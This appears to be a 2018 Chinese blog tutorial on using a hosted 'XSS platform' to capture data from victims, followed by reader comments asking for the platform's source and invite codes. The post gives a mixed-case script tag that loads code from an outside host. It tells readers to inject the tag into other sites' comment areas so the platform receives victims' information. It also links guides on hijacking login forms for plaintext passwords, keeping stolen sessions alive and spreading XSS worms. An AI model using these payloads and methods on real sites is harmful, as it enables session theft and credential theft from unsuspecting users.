A-A+

Xss平台详细使用教程

2018年01月03日 19:42 学习笔记 评论 11 条 共2048字 (阅读19,936 views次)

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

请仔细查看本文,相信你讲对XSS平台有另类的了解,注意是【仔细查看本文】!!!
首先登录XSS平台,进入 Xss平台之后是如下界面。  (以下所有图片点击都可以查看大图或原图)

XSS平台登陆后界面

XSS平台登陆后界面

登录进去后,首先要创建一个项目。这个项目主要是为了标记你想测试某个网站。如下图:

创建XSS平台项目

创建XSS平台项目

点击创建项目之后如下图:

创建项目第一步(注意看图中内容)

创建项目第一步(注意看图方框中内容)

然后点击下一步。然后配置项目:

配置项目功能

配置项目功能(这里如果不懂建议只勾选“默认模块”)

这里不要太多模块都勾选,非常非常容易导致JS报错,如果报错,那么可能你就收不到对方的中招信息了。尽量只勾选一个或两个。

然后点击下一步,就完成了。完成后如下图:

创建项目成功后会给出项目代码

创建项目成功后会给出项目代码

这里说明一下,注意上方的红框,这里最好是复制上方第一个红色方框中的内容,例如:

<sCRiPt sRC=//xyl.life/xxxx></sCrIpT>  这个就是项目给你的代码,这里说一下你需要测试的网站是https的网站且你的XSS平台也支持https那么你可以把这个代码改成 <sCRiPt sRC=https://xyl.life/xxxx></sCrIpT> 这样。

 

这里还要说明一下,其实 <sCRiPt sRC=//xyl.life/xxxx></sCrIpT> 当网站前面是//的时候,代码会自动适配网站,如果对方网站是https的那么代码会自动从https加载,如果对方网站是http的那么代码会从http加载。所以,,,默认的这种方式是最好的插入方式。(xss平台不需要支持https,xss项目代码支持https就好,这句话自行理解)

 

如何从其他地方查看上面的项目代码呢?如下图:

查看项目代码方法

查看项目代码方法

至此最基本的XSS平台项目及使用方法建立完毕了,剩下就是拿你自己的项目代码来做测试喽。例如上面我项目对应的代码是:<sCRiPt sRC=//xsspt.com/xxxx></sCrIpT>

假设我想测试留言的地方就可以如下图:

测试留言区(不光可以测试这里,更多地方发挥你的想象)

测试留言区(不光可以测试这里,更多地方发挥你的想象)

然后如果对方中招了,那么你的XSS平台就会有收到对方的信息。好了,这是最基本的使用方法。

 

下面是本人整理的一些XSS平台进阶的使用方法:

图片XSS 获取对方后台 使用讲解    https://woj.app/1785.html

XSS 之 form表单劫持(通用明文记录)    https://woj.app/1684.html (这里推荐使用平台最新表单劫持插件,无需设置,直接可用)

xss获取后台二级密码 – URL跳转 (地址栏不变)    https://woj.app/1820.html

后台(内网)打穿神器→xss蠕虫    https://woj.app/2173.html

xss平台持久cookie说明 keepsession说明    https://woj.app/1907.html

不用cookie 一个储存XSS对“某btc平台”攻城略地  https://woj.app/3035.html

--------------------------XSS经典案例之一----------------------

百度搜索框反射XSS分析 (2015年案例)    https://woj.app/2089.html

一波三折之某站点反射XSS (绕WAF防御)    https://woj.app/1603.html

京东驳回的一枚轻易paylod而不易exploit的xss的开发过程    https://woj.app/1590.html

 

网络上免费XSS平台集合:https://sec.ly.com/xsspt.txt     这里全部都是网络上公开的,不公开的,免费的收费的XSS平台集合,任君选择。

 

https://woj.app/liuyan/

布施恩德可便相知重

微信扫一扫打赏

支付宝扫一扫打赏

×

11 条留言  访客:11 条  博主:0 条

  1. 蜗牛也很牛

    可以注册个帐号吗 想多学习学习

  2. 低调美

    你的收费版XSS平台源码怎么卖?加我QQ卖我个研究下,发你邮件你也没有回我

    • gdd

      程序不卖的 有免费版本。。。

  3. fangke

    您好,搭建好平台后输入默认的用户名与密码,显示错误,怎么回事?

  4. fangke

    您好,搭建好平台后输入默认的用户名(admin)与密码(1234567),显示”登录失败,请检查用户名/邮箱或密码”,怎么回事?

  5. aimorc

    老哥,我不能keepsession了,最开始的几个任务删除了,现在就一个任务
    收到邮件提醒了,但是看不到内容

  6. 暗魂殿

    大佬,给个邀请码呗(eHNzMGRheUBwcm90b25tYWlsLmNo)。

    • gdd

      不好意思,邀请码只能有偿给土司论坛的朋友,而且朋友你留的还是匿名邮箱。。。。。。可以说很社会。

  7. 星期日你有空吗

    那啥,你这套程序能给我一哈不,我要里头的那些xss脚本..嘻嘻.

  8. 23

    老哥,平台搭好了以后显示500,本地搭也是白页,试过切换php版本。也不行。

  9. 小白

    想问最新劫持表单,不清除缓存只能接收到一次消息,还有获取浏览器记住的明文密码,这个怎么填写type1 2 ,id1 2 , name1 2,这个是否可以接收到input的文本内容呢?麻烦大佬给回信息或者私聊给个联系方式

给我留言取消回复